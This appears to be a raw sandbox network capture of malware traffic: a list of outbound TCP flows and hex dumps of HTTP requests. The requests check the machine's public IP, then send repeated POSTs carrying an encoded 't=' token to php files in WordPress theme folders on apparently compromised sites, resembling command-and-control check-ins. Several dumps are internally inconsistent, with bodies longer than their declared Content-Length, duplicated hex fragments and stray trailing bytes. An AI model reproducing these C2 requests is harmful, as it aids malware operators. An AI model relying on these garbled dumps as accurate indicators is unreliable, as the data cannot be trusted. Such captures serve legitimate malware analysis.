Flows TCP192.168.1.1:1059 ➝ 103.6.196.199:80
Flows TCP192.168.1.1:1060 ➝ 199.83.209.254:80
Flows TCP192.168.1.1:1061 ➝ 192.254.235.115:80
Flows TCP192.168.1.1:1062 ➝ 205.234.144.58:80
Flows TCP192.168.1.1:1063 ➝ 94.73.161.178:80
Flows TCP192.168.1.1:1064 ➝ 216.222.194.11:80
Flows TCP192.168.1.1:1065 ➝ 176.221.32.80:80
Flows TCP192.168.1.1:1066 ➝ 187.85.78.21:80
Flows TCP192.168.1.1:1067 ➝ 216.70.101.218:80
Flows TCP192.168.1.1:1068 ➝ 46.28.239.225:80
Flows TCP192.168.1.1:1069 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1070 ➝ 81.169.172.124:80
Flows TCP192.168.1.1:1071 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1072 ➝ 87.98.239.87:80
Flows TCP192.168.1.1:1073 ➝ 82.165.27.189:80
Flows TCP192.168.1.1:1074 ➝ 72.55.164.151:80
Flows TCP192.168.1.1:1075 ➝ 5.39.186.193:80
Flows TCP192.168.1.1:1076 ➝ 213.212.61.142:80
Flows TCP192.168.1.1:1077 ➝ 213.186.33.104:80
Flows TCP192.168.1.1:1078 ➝ 204.152.254.221:80
Flows TCP192.168.1.1:1079 ➝ 195.140.255.216:80
Flows TCP192.168.1.1:1080 ➝ 82.79.33.30:80
Flows TCP192.168.1.1:1081 ➝ 112.125.17.103:80
Flows TCP192.168.1.1:1082 ➝ 192.185.182.214:80
Flows TCP192.168.1.1:1083 ➝ 192.254.232.70:80
Flows TCP192.168.1.1:1084 ➝ 153.121.67.31:80
Flows TCP192.168.1.1:1085 ➝ 188.165.143.3:80
Flows TCP192.168.1.1:1086 ➝ 72.167.244.229:80
Flows TCP192.168.1.1:1087 ➝ 194.105.29.134:80
Flows TCP192.168.1.1:1088 ➝ 69.73.168.159:80
Flows TCP192.168.1.1:1089 ➝ 188.116.20.101:80
Flows TCP192.168.1.1:1090 ➝ 72.34.49.86:80
Flows TCP192.168.1.1:1091 ➝ 113.160.56.26:80
Flows TCP192.168.1.1:1092 ➝ 93.190.48.7:80
Flows TCP192.168.1.1:1093 ➝ 85.214.90.210:80
Flows TCP192.168.1.1:1094 ➝ 103.6.198.15:80
Flows TCP192.168.1.1:1095 ➝ 50.56.178.10:80
Flows TCP192.168.1.1:1096 ➝ 103.6.196.199:80
Flows TCP192.168.1.1:1097 ➝ 103.6.196.199:80
Flows TCP192.168.1.1:1098 ➝ 199.83.209.254:80
Flows TCP192.168.1.1:1099 ➝ 192.254.235.115:80
Flows TCP192.168.1.1:1100 ➝ 205.234.144.58:80
Flows TCP192.168.1.1:1101 ➝ 94.73.161.178:80
Flows TCP192.168.1.1:1102 ➝ 216.222.194.11:80
Flows TCP192.168.1.1:1103 ➝ 176.221.32.80:80
Flows TCP192.168.1.1:1104 ➝ 187.85.78.21:80
Flows TCP192.168.1.1:1105 ➝ 216.70.101.218:80
Flows TCP192.168.1.1:1106 ➝ 46.28.239.225:80
Flows TCP192.168.1.1:1107 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1108 ➝ 81.169.172.124:80
Flows TCP192.168.1.1:1109 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1110 ➝ 87.98.239.87:80
Flows TCP192.168.1.1:1111 ➝ 82.165.27.189:80
Flows TCP192.168.1.1:1112 ➝ 72.55.164.151:80
Flows TCP192.168.1.1:1113 ➝ 5.39.186.193:80
Flows TCP192.168.1.1:1114 ➝ 213.212.61.142:80
Flows TCP192.168.1.1:1115 ➝ 213.186.33.104:80
Flows TCP192.168.1.1:1116 ➝ 204.152.254.221:80
Flows TCP192.168.1.1:1117 ➝ 195.140.255.216:80
Flows TCP192.168.1.1:1118 ➝ 82.79.33.30:80
Flows TCP192.168.1.1:1119 ➝ 112.125.17.103:80
Flows TCP192.168.1.1:1120 ➝ 192.185.182.214:80
Flows TCP192.168.1.1:1121 ➝ 192.254.232.70:80
Flows TCP192.168.1.1:1122 ➝ 153.121.67.31:80
Flows TCP192.168.1.1:1123 ➝ 188.165.143.3:80
Flows TCP192.168.1.1:1124 ➝ 72.167.244.229:80
Flows TCP192.168.1.1:1125 ➝ 194.105.29.134:80
Flows TCP192.168.1.1:1126 ➝ 69.73.168.159:80
Flows TCP192.168.1.1:1127 ➝ 188.116.20.101:80
Flows TCP192.168.1.1:1128 ➝ 72.34.49.86:80
Flows TCP192.168.1.1:1129 ➝ 113.160.56.26:80
Flows TCP192.168.1.1:1130 ➝ 93.190.48.7:80
Flows TCP192.168.1.1:1131 ➝ 85.214.90.210:80
Flows TCP192.168.1.1:1132 ➝ 103.6.198.15:80
Flows TCP192.168.1.1:1133 ➝ 50.56.178.10:80
Flows TCP192.168.1.1:1134 ➝ 103.6.196.199:80
Flows TCP192.168.1.1:1135 ➝ 103.6.196.199:80
Flows TCP192.168.1.1:1136 ➝ 199.83.209.254:80
Flows TCP192.168.1.1:1137 ➝ 192.254.235.115:80
Flows TCP192.168.1.1:1138 ➝ 205.234.144.58:80
Flows TCP192.168.1.1:1139 ➝ 94.73.161.178:80
Flows TCP192.168.1.1:1140 ➝ 216.222.194.11:80

Raw Pcap
0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c653b 204d5349 4520372e 303b2057   ble; MSIE 7.0; W
0x00000040 (00064)   696e646f 7773204e 5420362e 313b2057   indows NT 6.1; W
0x00000050 (00080)   4f573634 3b205472 6964656e 742f342e   OW64; Trident/4.
0x00000060 (00096)   303b2053 4c434332 3b202e4e 45542043   0; SLCC2; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 3b202e4e   LR 2.0.50727; .N
0x00000080 (00128)   45542043 4c522033 2e352e33 30373239   ET CLR 3.5.30729
0x00000090 (00144)   3b202e4e 45542043 4c522033 2e302e33   ; .NET CLR 3.0.3
0x000000a0 (00160)   30373239 3b204d65 64696120 43656e74   0729; Media Cent
0x000000b0 (00176)   65722050 4320362e 30290d0a 486f7374   er PC 6.0)..Host
0x000000c0 (00192)   3a206970 2d616464 722e6573 0d0a4361   : ip-addr.es..Ca
0x000000d0 (00208)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000e0 (00224)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f726177 20485454 502f312e   GET /raw HTTP/1.
0x00000010 (00016)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000020 (00032)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000030 (00048)   61746962 6c653b20 4d534945 20372e30   atible; MSIE 7.0
0x00000040 (00064)   3b205769 6e646f77 73204e54 20362e31   ; Windows NT 6.1
0x00000050 (00080)   3b20574f 5736343b 20547269 64656e74   ; WOW64; Trident
0x00000060 (00096)   2f342e30 3b20534c 4343323b 202e4e45   /4.0; SLCC2; .NE
0x00000070 (00112)   5420434c 5220322e 302e3530 3732373b   T CLR 2.0.50727;
0x00000080 (00128)   202e4e45 5420434c 5220332e 352e3330    .NET CLR 3.5.30
0x00000090 (00144)   3732393b 202e4e45 5420434c 5220332e   729; .NET CLR 3.
0x000000a0 (00160)   302e3330 3732393b 204d6564 69612043   0.30729; Media C
0x000000b0 (00176)   656e7465 72205043 20362e30 290d0a48   enter PC 6.0)..H
0x000000c0 (00192)   6f73743a 206d7965 78746572 6e616c69   ost: myexternali
0x000000d0 (00208)   702e636f 6d0d0a43 61636865 2d436f6e   p.com..Cache-Con
0x000000e0 (00224)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c653b 204d5349 4520372e 303b2057   ble; MSIE 7.0; W
0x00000040 (00064)   696e646f 7773204e 5420362e 313b2057   indows NT 6.1; W
0x00000050 (00080)   4f573634 3b205472 6964656e 742f342e   OW64; Trident/4.
0x00000060 (00096)   303b2053 4c434332 3b202e4e 45542043   0; SLCC2; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 3b202e4e   LR 2.0.50727; .N
0x00000080 (00128)   45542043 4c522033 2e352e33 30373239   ET CLR 3.5.30729
0x00000090 (00144)   3b202e4e 45542043 4c522033 2e302e33   ; .NET CLR 3.0.3
0x000000a0 (00160)   30373239 3b204d65 64696120 43656e74   0729; Media Cent
0x000000b0 (00176)   65722050 4320362e 30290d0a 486f7374   er PC 6.0)..Host
0x000000c0 (00192)   3a206375 726c6d79 69702e63 6f6d0d0a   : curlmyip.com..
0x000000d0 (00208)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000e0 (00224)   6f2d6361 6368650d 0a0d0a63 68650d0a   o-cache....che..
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f7770 2d636f6e 74656e74   POST /wp-content
0x00000010 (00016)   2f746865 6d65732f 73617465 6c6c6974   /themes/satellit
0x00000020 (00032)   655f636f 72702f69 6d67352e 7068703f   e_corp/img5.php?
0x00000030 (00048)   653d7334 31396562 38713974 39723332   e=s419eb8q9t9r32
0x00000040 (00064)   6a204854 54502f31 2e310d0a 41636365   j HTTP/1.1..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000060 (00096)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000070 (00112)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000080 (00128)   6c656e63 6f646564 0d0a436f 6e6e6563   lencoded..Connec
0x00000090 (00144)   74696f6e 3a20436c 6f73650d 0a436f6e   tion: Close..Con
0x000000a0 (00160)   74656e74 2d4c656e 6774683a 20313036   tent-Length: 106
0x000000b0 (00176)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000c0 (00192)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000d0 (00208)   7469626c 653b204d 53494520 372e303b   tible; MSIE 7.0;
0x000000e0 (00224)   2057696e 646f7773 204e5420 362e313b    Windows NT 6.1;
0x000000f0 (00240)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x00000100 (00256)   342e303b 20534c43 43323b20 2e4e4554   4.0; SLCC2; .NET
0x00000110 (00272)   20434c52 20322e30 2e353037 32373b20    CLR 2.0.50727; 
0x00000120 (00288)   2e4e4554 20434c52 20332e35 2e333037   .NET CLR 3.5.307
0x00000130 (00304)   32393b20 2e4e4554 20434c52 20332e30   29; .NET CLR 3.0
0x00000140 (00320)   2e333037 32393b20 4d656469 61204365   .30729; Media Ce
0x00000150 (00336)   6e746572 20504320 362e3029 0d0a486f   nter PC 6.0)..Ho
0x00000160 (00352)   73743a20 70617472 616b6f6d 2e636f2e   st: patrakom.co.
0x00000170 (00368)   69640d0a 43616368 652d436f 6e74726f   id..Cache-Contro
0x00000180 (00384)   6c3a206e 6f2d6361 6368650d 0a0d0a74   l: no-cache....t
0x00000190 (00400)   3d643630 64643938 33323031 38353832   =d60dd9832018582
0x000001a0 (00416)   39396164 36393762 32613163 66326662   99ad697b2a1cf2fb
0x000001b0 (00432)   65633033 31623637 33623337 34313763   ec031b673b37417c
0x000001c0 (00448)   39373532 38643461 35356661 39656634   97528d4a55fa9ef4
0x000001d0 (00464)   38363531 35616330 65343336 34313964   86515ac0e436419d
0x000001e0 (00480)   65356262 30303234 65386638 35613465   e5bb0024e8f85a4e
0x000001f0 (00496)   38333933 30346533 39                  839304e39

0x00000000 (00000)   504f5354 202f7770 2d636f6e 74656e74   POST /wp-content
0x00000010 (00016)   2f746865 6d65732f 556c7472 614c6967   /themes/UltraLig
0x00000020 (00032)   68742f69 6d67342e 7068703f 7a3d7334   ht/img4.php?z=s4
0x00000030 (00048)   31396562 38713974 39723332 6a204854   19eb8q9t9r32j HT
0x00000040 (00064)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 74656e74 2d547970   */*..Content-Typ
0x00000060 (00096)   653a2061 70706c69 63617469 6f6e2f78   e: application/x
0x00000070 (00112)   2d777777 2d666f72 6d2d7572 6c656e63   -www-form-urlenc
0x00000080 (00128)   6f646564 0d0a436f 6e6e6563 74696f6e   oded..Connection
0x00000090 (00144)   3a20436c 6f73650d 0a436f6e 74656e74   : Close..Content
0x000000a0 (00160)   2d4c656e 6774683a 20313036 0d0a5573   -Length: 106..Us
0x000000b0 (00176)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000c0 (00192)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x000000d0 (00208)   653b204d 53494520 372e303b 2057696e   e; MSIE 7.0; Win
0x000000e0 (00224)   646f7773 204e5420 362e313b 20574f57   dows NT 6.1; WOW
0x000000f0 (00240)   36343b20 54726964 656e742f 342e303b   64; Trident/4.0;
0x00000100 (00256)   20534c43 43323b20 2e4e4554 20434c52    SLCC2; .NET CLR
0x00000110 (00272)   20322e30 2e353037 32373b20 2e4e4554    2.0.50727; .NET
0x00000120 (00288)   20434c52 20332e35 2e333037 32393b20    CLR 3.5.30729; 
0x00000130 (00304)   2e4e4554 20434c52 20332e30 2e333037   .NET CLR 3.0.307
0x00000140 (00320)   32393b20 4d656469 61204365 6e746572   29; Media Center
0x00000150 (00336)   20504320 362e3029 0d0a486f 73743a20    PC 6.0)..Host: 
0x00000160 (00352)   6b726974 69736368 65726b6f 6e73756d   kritischerkonsum
0x00000170 (00368)   2e756e69 2d6b6f65 6c6e2e64 650d0a43   .uni-koeln.de..C
0x00000180 (00384)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x00000190 (00400)   2d636163 68650d0a 0d0a743d 64363064   -cache....t=d60d
0x000001a0 (00416)   64393833 32303138 35383239 39616436   d983201858299ad6
0x000001b0 (00432)   39376232 61316366 32666265 63303331   97b2a1cf2fbec031
0x000001c0 (00448)   62363733 62333734 31376339 37353238   b673b37417c97528
0x000001d0 (00464)   64346135 35666139 65663438 36353135   d4a55fa9ef486515
0x000001e0 (00480)   61633065 34333634 31396465 35626230   ac0e436419de5bb0
0x000001f0 (00496)   30323465 38663835 61346538 33393330   024e8f85a4e83930
0x00000200 (00512)   34653339                              4e39

0x00000000 (00000)   504f5354 202f7770 2d636f6e 74656e74   POST /wp-content
0x00000010 (00016)   2f746865 6d65732f 656d2f69 6d67322e   /themes/em/img2.
0x00000020 (00032)   7068703f 783d7334 31396562 38713974   php?x=s419eb8q9t
0x00000030 (00048)   39723332 6a204854 54502f31 2e310d0a   9r32j HTTP/1.1..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000060 (00096)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000070 (00112)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000080 (00128)   6e6e6563 74696f6e 3a20436c 6f73650d   nnection: Close.
0x00000090 (00144)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x000000a0 (00160)   20313036 0d0a5573 65722d41 67656e74    106..User-Agent
0x000000b0 (00176)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x000000c0 (00192)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x000000d0 (00208)   372e303b 2057696e 646f7773 204e5420   7.0; Windows NT 
0x000000e0 (00224)   362e313b 20574f57 36343b20 54726964   6.1; WOW64; Trid
0x000000f0 (00240)   656e742f 342e303b 20534c43 43323b20   ent/4.0; SLCC2; 
0x00000100 (00256)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x00000110 (00272)   32373b20 2e4e4554 20434c52 20332e35   27; .NET CLR 3.5
0x00000120 (00288)   2e333037 32393b20 2e4e4554 20434c52   .30729; .NET CLR
0x00000130 (00304)   20332e30 2e333037 32393b20 4d656469    3.0.30729; Medi
0x00000140 (00320)   61204365 6e746572 20504320 362e3029   a Center PC 6.0)
0x00000150 (00336)   0d0a486f 73743a20 652d6d61 67617a61   ..Host: e-magaza
0x00000160 (00352)   6c61722e 636f6d0d 0a436163 68652d43   lar.com..Cache-C
0x00000170 (00368)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000180 (00384)   0d0a0d0a 743d6436 30646439 38333230   ....t=d60dd98320
0x00000190 (00400)   31383538 32393961 64363937 62326131   1858299ad697b2a1
0x000001a0 (00416)   63663266 62656330 33316236 37336233   cf2fbec031b673b3
0x000001b0 (00432)   37343137 63393735 32386434 61353566   7417c97528d4a55f
0x000001c0 (00448)   61396566 34383635 31356163 30653433   a9ef486515ac0e43
0x000001d0 (00464)   36343139 64653562 62303032 34653866   6419de5bb0024e8f
0x000001e0 (00480)   38356134 65383339 33303465 33396230   85a4e839304e39b0
0x000001f0 (00496)   30323465 38663835 61346538 33393330   024e8f85a4e83930
0x00000200 (00512)   34653339                              4e39

0x00000000 (00000)   504f5354 202f696d 61676573 2f696d67   POST /images/img
0x00000010 (00016)   332e7068 703f643d 73343139 65623871   3.php?d=s419eb8q
0x00000020 (00032)   39743972 33326a20 48545450 2f312e31   9t9r32j HTTP/1.1
0x00000030 (00048)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000040 (00064)   6f6e7465 6e742d54 7970653a 20617070   ontent-Type: app
0x00000050 (00080)   6c696361 74696f6e 2f782d77 77772d66   lication/x-www-f
0x00000060 (00096)   6f726d2d 75726c65 6e636f64 65640d0a   orm-urlencoded..
0x00000070 (00112)   436f6e6e 65637469 6f6e3a20 436c6f73   Connection: Clos
0x00000080 (00128)   650d0a43 6f6e7465 6e742d4c 656e6774   e..Content-Lengt
0x00000090 (00144)   683a2031 30360d0a 55736572 2d416765   h: 106..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000b0 (00176)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000c0 (00192)   4520372e 303b2057 696e646f 7773204e   E 7.0; Windows N
0x000000d0 (00208)   5420362e 313b2057 4f573634 3b205472   T 6.1; WOW64; Tr
0x000000e0 (00224)   6964656e 742f342e 303b2053 4c434332   ident/4.0; SLCC2
0x000000f0 (00240)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x00000100 (00256)   30373237 3b202e4e 45542043 4c522033   0727; .NET CLR 3
0x00000110 (00272)   2e352e33 30373239 3b202e4e 45542043   .5.30729; .NET C
0x00000120 (00288)   4c522033 2e302e33 30373239 3b204d65   LR 3.0.30729; Me
0x00000130 (00304)   64696120 43656e74 65722050 4320362e   dia Center PC 6.
0x00000140 (00320)   30290d0a 486f7374 3a20656e 676c6973   0)..Host: englis
0x00000150 (00336)   682e6361 6470726f 2e766e0d 0a436163   h.cadpro.vn..Cac
0x00000160 (00352)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000170 (00368)   61636865 0d0a0d0a 743d6436 30646439   ache....t=d60dd9
0x00000180 (00384)   38333230 31383538 32393961 64363937   83201858299ad697
0x00000190 (00400)   62326131 63663266 62656330 33316236   b2a1cf2fbec031b6
0x000001a0 (00416)   37336233 37343137 63393735 32386434   73b37417c97528d4
0x000001b0 (00432)   61353566 61396566 34383635 31356163   a55fa9ef486515ac
0x000001c0 (00448)   30653433 36343139 64653562 62303032   0e436419de5bb002
0x000001d0 (00464)   34653866 38356134 65383339 33303465   4e8f85a4e839304e
0x000001e0 (00480)   33396134 65383339 33303465 33396230   39a4e839304e39b0
0x000001f0 (00496)   30323465 38663835 61346538 33393330   024e8f85a4e83930
0x00000200 (00512)   34653339                              4e39

0x00000000 (00000)   504f5354 202f7770 2d636f6e 74656e74   POST /wp-content
0x00000010 (00016)   2f746865 6d65732f 41766164 612d5468   /themes/Avada-Th
0x00000020 (00032)   656d652f 696d6733 2e706870 3f793d73   eme/img3.php?y=s
0x00000030 (00048)   34313965 62387139 74397233 326a2048   419eb8q9t9r32j H
0x00000040 (00064)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e74656e 742d5479    */*..Content-Ty
0x00000060 (00096)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000070 (00112)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x00000080 (00128)   636f6465 640d0a43 6f6e6e65 6374696f   coded..Connectio
0x00000090 (00144)   6e3a2043 6c6f7365 0d0a436f 6e74656e   n: Close..Conten
0x000000a0 (00160)   742d4c65 6e677468 3a203130 360d0a55   t-Length: 106..U
0x000000b0 (00176)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x000000c0 (00192)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x000000d0 (00208)   6c653b20 4d534945 20372e30 3b205769   le; MSIE 7.0; Wi
0x000000e0 (00224)   6e646f77 73204e54 20362e31 3b20574f   ndows NT 6.1; WO
0x000000f0 (00240)   5736343b 20547269 64656e74 2f342e30   W64; Trident/4.0
0x00000100 (00256)   3b20534c 4343323b 202e4e45 5420434c   ; SLCC2; .NET CL
0x00000110 (00272)   5220322e 302e3530 3732373b 202e4e45   R 2.0.50727; .NE
0x00000120 (00288)   5420434c 5220332e 352e3330 3732393b   T CLR 3.5.30729;
0x00000130 (00304)   202e4e45 5420434c 5220332e 302e3330    .NET CLR 3.0.30
0x00000140 (00320)   3732393b 204d6564 69612043 656e7465   729; Media Cente
0x00000150 (00336)   72205043 20362e30 290d0a48 6f73743a   r PC 6.0)..Host:
0x00000160 (00352)   20707269 6e74646f 6d696e69 63612e63    printdominica.c
0x00000170 (00368)   6f6d0d0a 43616368 652d436f 6e74726f   om..Cache-Contro
0x00000180 (00384)   6c3a206e 6f2d6361 6368650d 0a0d0a74   l: no-cache....t
0x00000190 (00400)   3d643630 64643938 33323031 38353832   =d60dd9832018582
0x000001a0 (00416)   39396164 36393762 32613163 66326662   99ad697b2a1cf2fb
0x000001b0 (00432)   65633033 31623637 33623337 34313763   ec031b673b37417c
0x000001c0 (00448)   39373532 38643461 35356661 39656634   97528d4a55fa9ef4
0x000001d0 (00464)   38363531 35616330 65343336 34313964   86515ac0e436419d
0x000001e0 (00480)   65356262 30303234 65386638 35613465   e5bb0024e8f85a4e
0x000001f0 (00496)   38333933 30346533 39346538 33393330   839304e394e83930
0x00000200 (00512)   34653339                              4e39

0x00000000 (00000)   504f5354 202f7770 2d636f6e 74656e74   POST /wp-content
0x00000010 (00016)   2f746865 6d65732f 7477656e 74796669   /themes/twentyfi
0x00000020 (00032)   66746565 6e2f696d 67352e70 68703f66   fteen/img5.php?f
0x00000030 (00048)   3d733431 39656238 71397439 7233326a   =s419eb8q9t9r32j
0x00000040 (00064)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 436f6e74 656e742d   t: */*..Content-
0x00000060 (00096)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000070 (00112)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000080 (00128)   656e636f 6465640d 0a436f6e 6e656374   encoded..Connect
0x00000090 (00144)   696f6e3a 20436c6f 73650d0a 436f6e74   ion: Close..Cont
0x000000a0 (00160)   656e742d 4c656e67 74683a20 3130360d   ent-Length: 106.
0x000000b0 (00176)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x000000c0 (00192)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x000000d0 (00208)   69626c65 3b204d53 49452037 2e303b20   ible; MSIE 7.0; 
0x000000e0 (00224)   57696e64 6f777320 4e542036 2e313b20   Windows NT 6.1; 
0x000000f0 (00240)   574f5736 343b2054 72696465 6e742f34   WOW64; Trident/4
0x00000100 (00256)   2e303b20 534c4343 323b202e 4e455420   .0; SLCC2; .NET 
0x00000110 (00272)   434c5220 322e302e 35303732 373b202e   CLR 2.0.50727; .
0x00000120 (00288)   4e455420 434c5220 332e352e 33303732   NET CLR 3.5.3072
0x00000130 (00304)   393b202e 4e455420 434c5220 332e302e   9; .NET CLR 3.0.
0x00000140 (00320)   33303732 393b204d 65646961 2043656e   30729; Media Cen
0x00000150 (00336)   74657220 50432036 2e30290d 0a486f73   ter PC 6.0)..Hos
0x00000160 (00352)   743a2072 756e6c6f 76652e75 730d0a43   t: runlove.us..C
0x00000170 (00368)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x00000180 (00384)   2d636163 68650d0a 0d0a743d 64363064   -cache....t=d60d
0x00000190 (00400)   64393833 32303138 35383239 39616436   d983201858299ad6
0x000001a0 (00416)   39376232 61316366 32666265 63303331   97b2a1cf2fbec031
0x000001b0 (00432)   62363733 62333734 31376339 37353238   b673b37417c97528
0x000001c0 (00448)   64346135 35666139 65663438 36353135   d4a55fa9ef486515
0x000001d0 (00464)   61633065 34333634 31396465 35626230   ac0e436419de5bb0
0x000001e0 (00480)   30323465 38663835 61346538 33393330   024e8f85a4e83930
0x000001f0 (00496)   34653339 30346533 39346538 33393330   4e3904e394e83930
0x00000200 (00512)   34653339                              4e39

0x00000000 (00000)   504f5354 202f3365 31363236 34372d63   POST /3e162647-c
0x00000010 (00016)   3364382d 34346333 2d393937 622d3061   3d8-44c3-997b-0a
0x00000020 (00032)   63396135 66363838 33322f20 48545450   c9a5f68832/ HTTP
0x00000030 (00048)   2f312e31 0d0a4361 6368652d 436f6e74   /1.1..Cache-Cont
0x00000040 (00064)   726f6c3a 206e6f2d 63616368 650d0a43   rol: no-cache..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000060 (00096)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x00000070 (00112)   68650d0a 436f6e74 656e742d 54797065   he..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f736f   : application/so
0x00000090 (00144)   61702b78 6d6c0d0a 55736572 2d416765   ap+xml..User-Age
0x000000a0 (00160)   6e743a20 57534441 50490d0a 436f6e74   nt: WSDAPI..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3733330d   ent-Length: 733.
0x000000c0 (00192)   0a486f73 743a2031 39322e31 36382e31   .Host: 192.168.1
0x000000d0 (00208)   30302e32 30353a35 3335370d 0a0d0a3c   00.205:5357....<
0x000000e0 (00224)   3f786d6c 20766572 73696f6e 3d22312e   ?xml version="1.
0x000000f0 (00240)   30222065 6e636f64 696e673d 22757466   0" encoding="utf
0x00000100 (00256)   2d38223f 3e3c736f 61703a45 6e76656c   -8"?><soap:Envel
0x00000110 (00272)   6f706520 786d6c6e 733a736f 61703d22   ope xmlns:soap="
0x00000120 (00288)   68747470 3a2f2f77 77772e77 332e6f72   http://www.w3.or
0x00000130 (00304)   672f3230 30332f30 352f736f 61702d65   g/2003/05/soap-e
0x00000140 (00320)   6e76656c 6f706522 20786d6c 6e733a77   nvelope" xmlns:w
0x00000150 (00336)   73613d22 68747470 3a2f2f73 6368656d   sa="http://schem
0x00000160 (00352)   61732e78 6d6c736f 61702e6f 72672f77   as.xmlsoap.org/w
0x00000170 (00368)   732f3230 30342f30 382f6164 64726573   s/2004/08/addres
0x00000180 (00384)   73696e67 2220786d 6c6e733a 6c6d733d   sing" xmlns:lms=
0x00000190 (00400)   22687474 703a2f2f 73636865 6d61732e   "http://schemas.
0x000001a0 (00416)   6d696372 6f736f66 742e636f 6d2f7769   microsoft.com/wi
0x000001b0 (00432)   6e646f77 732f6c6d 732f3230 30372f30   ndows/lms/2007/0
0x000001c0 (00448)   38223e3c 736f6170 3a486561 6465723e   8"><soap:Header>
0x000001d0 (00464)   3c777361 3a546f3e 75726e3a 75756964   <wsa:To>urn:uuid
0x000001e0 (00480)   3a336531 36323634 372d6333 64382d34   :3e162647-c3d8-4
0x000001f0 (00496)   3463332d 39393762 2d306163 39613566   4c3-997b-0ac9a5f
0x00000200 (00512)   36383833 323c2f77 73613a54 6f3e3c77   68832</wsa:To><w
0x00000210 (00528)   73613a41 6374696f 6e3e6874 74703a2f   sa:Action>http:/
0x00000220 (00544)   2f736368 656d6173 2e786d6c 736f6170   /schemas.xmlsoap
0x00000230 (00560)   2e6f7267 2f77732f 32303034 2f30392f   .org/ws/2004/09/
0x00000240 (00576)   7472616e 73666572 2f476574 3c2f7773   transfer/Get</ws
0x00000250 (00592)   613a4163 74696f6e 3e3c7773 613a4d65   a:Action><wsa:Me
0x00000260 (00608)   73736167 6549443e 75726e3a 75756964   ssageID>urn:uuid
